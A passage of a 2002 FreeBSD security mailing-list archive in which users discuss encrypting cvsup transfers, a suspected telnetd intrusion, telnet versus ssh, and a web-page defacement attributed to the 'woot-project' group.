straight, you want to encrypt an anon ftp > session? And the purpose would be? It's publicly available data you are > transfering to your box, why in the world would you want to encrypt it? I suppose that someone could be watching your ftp traffic, and know you've installed FreeBSD. Then, no matter how much you obsfucate what your OS looks like, they'll know it might be FreeBSD. :) -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:33: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from energyhq.homeip.net (213-97-200-73.uc.nombres.ttd.es [213.97.200.73]) by hub.freebsd.org (Postfix) with ESMTP id 0CF8437B400 for ; Mon, 6 May 2002 14:32:59 -0700 (PDT) Received: by energyhq.homeip.net (Postfix, from userid 1001) id 9DB8D3FCA8; Mon, 6 May 2002 23:33:01 +0200 (CEST) Date: Mon, 6 May 2002 23:33:01 +0200 From: Miguel Mendez To: Matt Piechota Cc: SolarfluX , security@FreeBSD.ORG Subject: Re: cvsup/install over ssh? Message-ID: <20020506233301.A33672@energyhq.homeip.net> Mail-Followup-To: Matt Piechota , SolarfluX , security@FreeBSD.ORG References: <20020506231634.A33284@energyhq.homeip.net> <20020506172523.K71568-100000@cithaeron.argolis.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="RnlQjJ0d97Da+TV1" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020506172523.K71568-100000@cithaeron.argolis.org>; from piechota@argolis.org on Mon, May 06, 2002 at 05:27:02PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, May 06, 2002 at 05:27:02PM -0400, Matt Piechota wrote: Hi, > I suppose that someone could be watching your ftp traffic, and know you've > installed FreeBSD. Then, no matter how much you obsfucate what your OS > looks like, they'll know it might be FreeBSD. :) If you are *that* paranoid you can buy the CD set :-) Cheers, --=20 Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk FreeBSD - The power to serve! --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE81vaNnLctrNyFFPERAu94AJ0aI+4s2TFdOr/fRgd9UZ2CP1EajACfctKh STfkQjhj6o8YaasxliETslY= =OL4j -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:34:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from frigg.inter.net.il (frigg.inter.net.il [192.114.186.16]) by hub.freebsd.org (Postfix) with ESMTP id 2D69C37B401 for ; Mon, 6 May 2002 14:34:06 -0700 (PDT) Received: from noused ([80.230.140.101]) by frigg.inter.net.il (Mirapoint Messaging Server MOS 3.1.0.54-GA) with SMTP id BKF15084; Tue, 7 May 2002 00:33:51 +0300 (IDT) Message-ID: <004801c1f54d$cf821420$658ce650@noused> From: "Retal" To: References: <20020506172523.K71568-100000@cithaeron.argolis.org> Subject: Re: cvsup/install over ssh? Date: Tue, 7 May 2002 00:31:37 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org believe me , if someone wanna know whats ur OS.. he will know with or without encrypt.. and one other thing.. if you are secured enough, who cares.. retal (retal@retal.co.il) ----- Original Message ----- From: "Matt Piechota" To: "Miguel Mendez" Cc: "SolarfluX" ; Sent: Monday, May 06, 2002 11:27 PM Subject: Re: cvsup/install over ssh? > On Mon, 6 May 2002, Miguel Mendez wrote: > > > Hmmkay, let me get this straight, you want to encrypt an anon ftp > > session? And the purpose would be? It's publicly available data you are > > transfering to your box, why in the world would you want to encrypt it? > > I suppose that someone could be watching your ftp traffic, and know you've > installed FreeBSD. Then, no matter how much you obsfucate what your OS > looks like, they'll know it might be FreeBSD. :) > > -- > Matt Piechota > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:36:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 3FC7437B403 for ; Mon, 6 May 2002 14:35:54 -0700 (PDT) Received: (qmail 15792 invoked by uid 1001); 6 May 2002 21:35:53 -0000 Date: Mon, 6 May 2002 17:35:53 -0400 From: "Peter C. Lai" To: Matt Piechota Cc: Miguel Mendez , SolarfluX , security@FreeBSD.ORG Subject: Re: cvsup/install over ssh? Message-ID: <20020506173553.A15713@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020506231634.A33284@energyhq.homeip.net> <20020506172523.K71568-100000@cithaeron.argolis.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020506172523.K71568-100000@cithaeron.argolis.org>; from piechota@argolis.org on Mon, May 06, 2002 at 05:27:02PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 05:27:02PM -0400, Matt Piechota wrote: > On Mon, 6 May 2002, Miguel Mendez wrote: > > > Hmmkay, let me get this straight, you want to encrypt an anon ftp > > session? And the purpose would be? It's publicly available data you are > > transfering to your box, why in the world would you want to encrypt it? > > I suppose that someone could be watching your ftp traffic, and know you've > installed FreeBSD. Then, no matter how much you obsfucate what your OS > looks like, they'll know it might be FreeBSD. :) > I'd rather advertise my box as FreeBSD and not Linux. Tends to limit the amount of people trying to crack the box using stuff like old RPC hacks :) > -- > Matt Piechota > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:56:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 8F94F37B40C for ; Mon, 6 May 2002 14:56:19 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 5F5A82440D; Mon, 6 May 2002 16:56:18 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id A699C243C2; Mon, 6 May 2002 16:56:15 -0500 (CDT) Message-Id: <5.1.0.14.0.20020506165140.04f536b0@pop3s.schulte.org> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 06 May 2002 16:54:18 -0500 To: peter.lai@uconn.edu, Matt Piechota From: Christopher Schulte Subject: Re: cvsup/install over ssh? Cc: Miguel Mendez , SolarfluX , security@FreeBSD.ORG In-Reply-To: <20020506173553.A15713@cowbert.2y.net> References: <20020506172523.K71568-100000@cithaeron.argolis.org> <20020506231634.A33284@energyhq.homeip.net> <20020506172523.K71568-100000@cithaeron.argolis.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:35 PM 5/6/2002 -0400, Peter C. Lai wrote: >I'd rather advertise my box as FreeBSD and not Linux. Tends to >limit the amount of people trying to crack the box using stuff >like old RPC hacks :) I disagree. My FeeeBSD systems saw lots and lots of rpc and other 'linux like' exploitation scans before I just filtered most ports at my firewall. Don't rely on the sophistication of a kiddie's script as a security paradigm. >-- >Peter C. Lai >University of Connecticut >Dept. of Molecular and Cell Biology | Undergraduate Research Assistant >http://cowbert.2y.net/ -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 15: 1:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 4FEFD37B404 for ; Mon, 6 May 2002 15:01:05 -0700 (PDT) Received: (qmail 6736 invoked by uid 1000); 6 May 2002 22:01:04 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 May 2002 22:01:04 -0000 Date: Mon, 6 May 2002 15:01:03 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: cvsup/install over ssh? In-Reply-To: <20020506231634.A33284@energyhq.homeip.net> Message-ID: <20020506144118.D6630-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > Why doesn't cvsup have the option to be encrypted via ssh like > anoncvs does? > > IMHO nonsense, no sensitive data is exchanged between client and > server. > Hmmkay, let me get this straight, you want to encrypt an anon ftp > session? And the purpose would be? 1) Encryption provides more than privacy - it also provides authenticity. Other package management systems (eg, rpm, dpkg) allow for pgp-signing each binary package. Using ssl certs to set up the connection to the cvsup server would provide similar authenticity functionality to cvsup'ed source upgrades. Note that if you're worried about burning too much cpu, it would be sufficient to use the equivalent of ssh v2 with a null cipher - ie, to just do per-packet MAC'ing and not actually encrypt the packet payloads. 2) People use cvsup for more than just freebsd sources - it's a generally useful tool. I was using cvsup as part of website publication some time ago - I just proxied it over a stunnel and it worked okay. Maybe we can run cvsup behind a stunnel on one of the official cvsup mirrors? -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE81v0gswXMWWtptckRAspkAJwKmSRMs/VpqnoLbgisZ9qLfXHUuACfTlA4 Zqoxeezz+oiWM6cPT0siwEE= =l4vD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16: 2:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f207.law14.hotmail.com [64.4.21.207]) by hub.freebsd.org (Postfix) with ESMTP id 2CD3937B403 for ; Mon, 6 May 2002 16:02:28 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 6 May 2002 16:02:28 -0700 Received: from 130.39.202.184 by lw14fd.law14.hotmail.msn.com with HTTP; Mon, 06 May 2002 23:02:27 GMT X-Originating-IP: [130.39.202.184] From: "William J. Borskey" To: derrick@lumiere.net Cc: security@freebsd.org Subject: ethfw Date: Mon, 06 May 2002 16:02:27 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 06 May 2002 23:02:28.0125 (UTC) FILETIME=[17F6ACD0:01C1F552] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org am i supposed to use ethfw with ipfw, because ethfw looks very limited. _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16: 8:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from fed1mtao04.cox.net (fed1mtao04.cox.net [68.6.19.241]) by hub.freebsd.org (Postfix) with ESMTP id 3AB6237B404 for ; Mon, 6 May 2002 16:08:53 -0700 (PDT) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao04.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020506230853.ELUI26656.fed1mtao04.cox.net@ocnetworking.com> for ; Mon, 6 May 2002 19:08:53 -0400 Message-ID: <3CD70D86.872C3337@ocnetworking.com> Date: Mon, 06 May 2002 16:11:02 -0700 From: "Dylan A. Reinhold" Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: Telent Exploit References: <3CD6D3A2.1CC77A9B@ocnetworking.com> <20020506132502.D59402@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris Kennaway wrote: > On Mon, May 06, 2002 at 12:04:02PM -0700, Dylan A. Reinhold wrote: > > I think I just got hit with a telent exploit. I noticed some network > > activity on my cable modem, Logged in my gateway ran 'w' no one else but > >-------------SNIP ---------------SNIP----------------->>>>>>>>>>>>>>> > > > Im running stable what gives???? The worst part was I only had Telnet > > enabled for 3 hours.... > > Why do you think you were exploited? The above only shows people > connecting to the port. If you don't want people doing that, don't > allow them to. > > Kris When I saw the network activity and ran top, 'telnetd' was running something like 18% of the CPU with no visible users from 'who'. So I killed the telnetd pid, and all the traffic stopped. Then I looked at the security log the last entry was 15 minutes from when I killed 'telnetd'. Thanks, Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16:23:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from ziplip.com (mail.ziplip.com [128.242.109.119]) by hub.freebsd.org (Postfix) with ESMTP id 7ED0637B404 for ; Mon, 6 May 2002 16:23:39 -0700 (PDT) Received: from 10.1.0.21 (EHLO 10.1.0.21 10.1.0.21 [10.1.0.21] (may be forged)) by 10.1.0.21 with ESMTP id for ; 06 May 2002 16:22:46 -0700 (PDT) Message-ID: Date: Mon, 6 May 2002 16:22:46 -0700 (PDT) From: SolarfluX Reply-To: solarflux@ziplip.com To: security@freebsd.org Subject: Re: Telnet Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-ZLPwdHint: X-ZLExpiry: -1 X-ZLReceiptConfirm: N X-ZLAuthType: WEB-MAIL X-ZLAuthOn: Y X-Mailer: ZipLip Sonoma v3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > On Monday 06 May 2002 21:37, I wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > Borja wrote: > Why? Do you think ssh is more secure? It may not be. Just think about the > complexity of ssh. It has been hit by a bug in zlib, for example. Or has zlib > had an audit as strict as ssh? > > Telnet has its problems, but we should not say that ssh is "more secure" > acritically. It is obvious that it has advantages, however. Are you for real? Have you ever sniffed a connection between two machines using ssldump? When looking at a telnet or ftp connection, it shows everything, clear as day. At least with ssh, you'd need the key or have to know how to exploit/crack it, which is MUCH harder to do than root a node somewhere along the path and sniff. It's not just your systems that you have to worry about, either, it's all those intermediate systems that your data traverses between endpoints (which you have no control over, of course) that one needs to worry about. They can be broken into and used as sniffing points. Alas, this info is not new. As long as OpenSSH exploits are fixed in a timely fashion, I consider sshd to be MUCH more secure than telnetd. The zlib bug argument is pretty weak. As far as 'backwards-compatibility' goes, if an older system can't be upgraded to allow encrypted connectivity, it needs to be replaced by one that can. The idea here is to promote security and secure alternatives, and not archaic non-secure protocols/methods. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16:31:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 95BB337B401 for ; Mon, 6 May 2002 16:31:42 -0700 (PDT) Received: (qmail 10542 invoked by uid 1000); 6 May 2002 23:31:42 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 May 2002 23:31:42 -0000 Date: Mon, 6 May 2002 16:31:42 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: Telnet Exploit In-Reply-To: Message-ID: <20020506162611.R6630-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > Why? Do you think ssh is more secure? It may not be. Just think > > about the complexity of ssh. > > Are you for real? Have you ever sniffed a connection between two > machines using ssldump? When looking at a telnet or ftp connection, > it shows everything, clear as day. "Blah blah you'd have to be crazy to use telnet, it's plaintext! Use ssh!" "Except blah blah ipsec, telnet-over-ssl, etc, openssh has a history of bad bugs, push crypto down out of the application layer and keep your high-layer apps simple!" This thread is not new, and not especially relevent here. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE81xJeswXMWWtptckRAtVaAJ9PIBl+DhXVigcMJvrlwwxpkY8iaQCfaVns mKOJKttWcilCZMbmrs1xLDA= =olIv -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 17: 5:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from asimov.fdn.uq.edu.au (asimov.fdn.uq.edu.au [203.15.61.193]) by hub.freebsd.org (Postfix) with ESMTP id 4F44637B400 for ; Mon, 6 May 2002 17:05:46 -0700 (PDT) Received: from ACE01 (staff23.fdn.uq.edu.au [203.15.61.152]) by asimov.fdn.uq.edu.au (8.12.3/8.12.3) with SMTP id g4705gKB029390 for ; Tue, 7 May 2002 10:05:43 +1000 (EST) (envelope-from uqafarru@fdn.uq.edu.au) From: "Adam Farrugia" To: Subject: Date: Tue, 7 May 2002 10:02:34 +1000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0002_01C1F5AE.4F7448A0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MS-TNEF-Correlator: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0002_01C1F5AE.4F7448A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit freebsd-security ------=_NextPart_000_0002_01C1F5AE.4F7448A0 Content-Type: application/ms-tnef; name="winmail.dat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="winmail.dat" eJ8+IiIAAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEGgAMADgAAANIHBQAHAAoAAgAAAAIA8wAB A5AGAPgDAAAhAAAACwACAAEAAAALACMAAAAAAAMAJgAAAAAACwApAAAAAAADADYAAAAAAAIBcQAB AAAAFgAAAAHB9Vp9ZuopBdzsxUAnvgeMFYT/k2YAAAIBHQwBAAAAHAAAAFNNVFA6VVFBRkFSUlVA RkROLlVRLkVEVS5BVQALAAEOAAAAAEAABg4AjPdoWvXBAQIBCg4BAAAAGAAAAAAAAADAiK1qI5Jw Rqb2MCDwxSGxwoAAAAsAHw4BAAAAAgEJEAEAAAByAAAAbgAAAJQAAABMWkZ10u5IdQMACgByY3Bn MTI1FjIA+Atgbg4QMDMzTwH3AqQD4wIAY2gKwHOwZXQwIAcTAoB9CoGSdgiQd2sLgGQ0DGBuYwBQ CwMLtSADUAngYihzZC0RIGMIcXR5LwqiCoQVFhHhABYwAAALAAGACCAGAAAAAADAAAAAAAAARgAA AAADhQAAAAAAAAMAA4AIIAYAAAAAAMAAAAAAAABGAAAAABCFAAAAAAAAAwAHgAggBgAAAAAAwAAA AAAAAEYAAAAAUoUAAH1uAQAeAAmACCAGAAAAAADAAAAAAAAARgAAAABUhQAAAQAAAAQAAAA5LjAA CwANgAggBgAAAAAAwAAAAAAAAEYAAAAAgoUAAAEAAAALADqACCAGAAAAAADAAAAAAAAARgAAAAAO hQAAAAAAAAMAPIAIIAYAAAAAAMAAAAAAAABGAAAAABGFAAAAAAAAAwA9gAggBgAAAAAAwAAAAAAA AEYAAAAAGIUAAAAAAAALAFKACCAGAAAAAADAAAAAAAAARgAAAAAGhQAAAAAAAAMAU4AIIAYAAAAA AMAAAAAAAABGAAAAAAGFAAAAAAAAAgH4DwEAAAAQAAAAwIitaiOScEam9jAg8MUhsQIB+g8BAAAA EAAAAMCIrWojknBGpvYwIPDFIbECAfsPAQAAAJ8AAAAAAAAAOKG7EAXlEBqhuwgAKypWwgAAUFNU UFJYLkRMTAAAAAAAAAAATklUQfm/uAEAqgA32W4AAABDOlxEb2N1bWVudHMgYW5kIFNldHRpbmdz XEFkbWluaXN0cmF0b3JcTG9jYWwgU2V0dGluZ3NcQXBwbGljYXRpb24gRGF0YVxNaWNyb3NvZnRc T3V0bG9va1xvdXRsb29rLnBzdAAAAwD+DwUAAAADAA00/TcAAAIBfwABAAAANgAAADxIQUVHS0dQ R1BBS0lGTktQQUNDREtFSktDRUFBLnVxYWZhcnJ1QGZkbi51cS5lZHUuYXU+AAAAAwAGEBm3KYED AAcQEAAAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAABEAAABGUkVFQlNELVNFQ1VSSVRZAAAAAG3D ------=_NextPart_000_0002_01C1F5AE.4F7448A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 17:19:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 2D83437B401 for ; Mon, 6 May 2002 17:19:47 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g470Jkuk013512 for ; Mon, 6 May 2002 20:19:46 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Mon, 6 May 2002 20:19:41 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: Telnet Exploit In-Reply-To: <200205062103.g46L39R3024026@borja.sarenet.es> Message-ID: <20020506201808.V13363-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, Borja Marcos wrote: > On Monday 06 May 2002 21:37, you wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > > Why? Do you think ssh is more secure? It may not be. Just think about the > complexity of ssh. It has been hit by a bug in zlib, for example. Or has zlib Not vulnerable on FreeBSD unless you have phk_malloc configured to abort on a double-free. > had an audit as strict as ssh? > > Telnet has its problems, but we should not say that ssh is "more secure" > acritically. Yes, I think we can, if only because nothing goes over the wire in cleartext unless the user deliberately disables encryption for his or her session. > It is obvious that it has advantages, however. Yup. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net I was raised by a pack of wild corn dogs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 18: 0:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578012pcs.martnz01.ga.comcast.net [68.47.4.97]) by hub.freebsd.org (Postfix) with ESMTP id 5956337B413 for ; Mon, 6 May 2002 18:00:06 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g47102131809 for ; Mon, 6 May 2002 21:00:02 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CD72712.37CB5750@vortex.wa4phy.net> Date: Mon, 06 May 2002 21:00:02 -0400 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: security@freebsd.org Subject: Woot project Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello list, I just discovered I have been hacked on my main webpage from apparently the Woot project kiddies. I assume, right after the attack, I received an email from some outfit called alldas.org. My problem is this. According to what I have read about the woot project, access is gained by portscanning for the presence of SSH-1. I don't have SSH-1 or 2 active at the moment, so I'm wondering how access was gained. Have searched all the log files for unusual activity, and nothing is apparent so far. The message left at the bottom of my main page was: FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... - [sYn] of woot-project Aside from the SSH-1 vulunerabilities, is there any other known entry points associated with this cracker group? Thanks.. Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:19:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 4FDFF37B405 for ; Mon, 6 May 2002 22:19:17 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507051917.XELR9799.rwcrmhc51.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:19:17 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475JEv89612; Mon, 6 May 2002 22:19:14 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:19:14 -0700 From: "Crist J. Clark" To: "Dalin S. Owen" Cc: security@FreeBSD.ORG Subject: Re: Telnet Exploit Message-ID: <20020506221914.D89339@blossom.cjclark.org> References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200205061347.54915.dowen@pstis.com>; from dowen@pstis.com on Mon, May 06, 2002 at 01:47:54PM -0600 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 01:47:54PM -0600, Dalin S. Owen wrote: > On May 6, 2002 01:37 pm, SolarfluX wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > > So if we are going to do away with telnetd, we should scrap FTP... Definately scrap FTP. Data over a separate channel is a huge PITA. And remember, friends don't let friends run wu-ftpd. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:23:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 01E9B37B405 for ; Mon, 6 May 2002 